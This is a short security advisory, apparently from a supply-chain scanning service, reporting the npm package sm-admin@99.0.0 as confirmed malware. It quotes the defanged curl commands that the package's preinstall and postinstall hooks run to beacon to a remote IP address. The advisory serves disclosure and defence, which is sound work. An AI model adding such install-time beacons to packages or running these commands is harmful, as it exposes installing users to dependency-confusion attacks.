LWA-2026-11572 confirmed malware

sm-admin@99.0.0

Malicious code in sm-admin (npm)

T1059 · Command and Scripting InterpreterT1071.001 · Web Protocols

Analysis

sm-admin@99.0.0 (version 99.0.0, a dependency-confusion-shaped name) runs two install-time network beacons: its preinstall hook executes `curl -s hxxp://16[.]192[.]173[.]5/sm-admin/pre` and its postinstall hook executes `curl -s hxxp://16[.]192[.]173[.]5/sm-admin/post`, both fetching from the remote host 16[.]192[.]173[.]5 during package installation. The package ships no functional code (a 157-byte index.js that only logs a message).

analyzed by
Leitwacht
first seen
Aug 23, 2026, 06:30 PM
analyzed
Aug 23, 2026, 06:30 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.